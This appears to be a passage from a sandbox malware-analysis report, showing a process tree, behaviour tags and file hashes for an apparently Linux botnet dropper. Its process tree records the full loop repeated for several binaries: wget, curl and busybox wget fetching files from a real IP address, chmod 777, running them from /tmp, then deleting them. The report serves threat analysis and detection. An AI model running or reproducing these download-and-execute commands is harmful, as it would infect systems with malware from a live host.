/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:936
-
-
/bin/chmodchmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:942
-
-
/bin/chmodchmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:948
-
-
/bin/chmodchmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:954
-
-
/bin/chmodchmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:960
-
-
/bin/chmodchmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:966
-
-
/bin/chmodchmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:972
-
-
/bin/chmodchmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:975
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97